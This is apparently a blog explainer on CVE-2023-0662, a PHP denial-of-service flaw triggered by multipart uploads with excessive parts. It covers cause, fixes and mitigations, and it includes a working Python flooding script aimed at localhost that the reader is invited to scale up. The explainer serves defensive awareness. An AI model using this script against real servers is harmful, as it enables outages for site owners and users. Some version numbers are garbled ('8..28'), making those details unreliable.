CVE-2023-0662 - How Excessive File Uploads Can Crash Your PHP Server (with Exploit Example)

CVE-2023-0662 is a vulnerability discovered in PHP versions 8..x before 8..28, 8.1.x before 8.1.16, and 8.2.x before 8.2.3. It allows an attacker to crash or slow down a web server by simply sending a huge number of parts in an HTTP form upload. This leads to high CPU usage and tons of log files, eventually denying service to normal users—a classic Denial of Service (DoS) scenario.

This post will explain the vulnerability in plain language, show you how the problem works (with demo code!), and provide official references for further reading.

Why Is This a Problem?

In PHP, handling multipart/form-data (used for form file uploads) is common. But PHP’s parser had no reasonable limit for the number of form "parts." If someone uploads a form with thousands or even millions of fields or files, PHP works overtime parsing them:

Server slows or crashes, denying access to real users.

This attack requires no authentication. Anyone who can post data to your site can try it.

Quick Example: Exploiting CVE-2023-0662

Let's look at how an attacker might make use of this bug with a simple Python script. This script *spams* your PHP server with a giant HTTP POST request full of form parts.

> ⚠️ Only run the following code in your own safe test environment! Don't attack real servers.

Python Exploit Script

import requests

TARGET_URL = 'http://localhost/upload.php';

# Create a super-large multipart/form-data body
boundary = '----WebKitFormBoundaryxYz'  # Just something unique
parts = []

# Prepare 10,000 fake file fields (you can increase this number for a stronger attack)
for i in range(10000):
    part = (
        f'--{boundary}\r\n'
        f'Content-Disposition: form-data; name="file{i}"; filename="file{i}.txt"\r\n'
        f'Content-Type: text/plain\r\n\r\n'
        f'dummy content {i}\r\n'
    )
    parts.append(part)

parts.append(f'--{boundary}--\r\n')
body = ''.join(parts)

headers = {
    'Content-Type': f'multipart/form-data; boundary={boundary}'
}

response = requests.post(TARGET_URL, data=body, headers=headers)
print("Response code:", response.status_code)

After running this, check your server's CPU, memory, and logs—you’ll likely see a big spike.

Suppose this is your simple upload handler on the server

<?php
// upload.php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    foreach ($_FILES as $file) {
        // Just list file names (no real processing)
        echo 'Received: ' . htmlspecialchars($file['name']) . "
";
    }
}
?>

If you attack this script with the previous Python code, PHP's multipart parser gets overloaded—processing thousands of files even if you don't do anything with them.

How Serious Is This?

- Anyone can trigger this DoS, since it just needs access to your upload endpoint (no login required).
- All PHP servers running affected versions (8..x < 8..28, 8.1.x < 8.1.16, 8.2.x < 8.2.3) are vulnerable if they accept file uploads.

This can be used to bring down websites, exhaust logging disk space, or disrupt services until the server is rebooted or the logs are cleared.

How Did PHP Fix It?

PHP now limits the number of multipart form parts it will process. If excessive parts come in, PHP stops parsing and throws an error.

Official References

- PHP Changelog for 8..28
- NVD Entry for CVE-2023-0662
- GitHub PHP Patch Diff

Upgrade PHP to the latest safe release for your branch.

2. Set reasonable limits on your web server (e.g., post_max_size, upload_max_filesize, and possibly a custom reverse proxy rule to cap requests).
3. Use a Web Application Firewall (WAF) that blocks requests with an excessive number of form parts or files.

Summary

CVE-2023-0662 is a real-world DoS risk for PHP sites. If you run a PHP upload endpoint and haven't updated in a while, an attacker could flood you with huge forms, eat your CPU, fill your disks, and take you offline. Fixing it is as simple as updating PHP and setting smart upload limits.

Timeline

Published on: 02/16/2023 07:15:00 UTC
Last modified on: 02/24/2023 18:09:00 UTC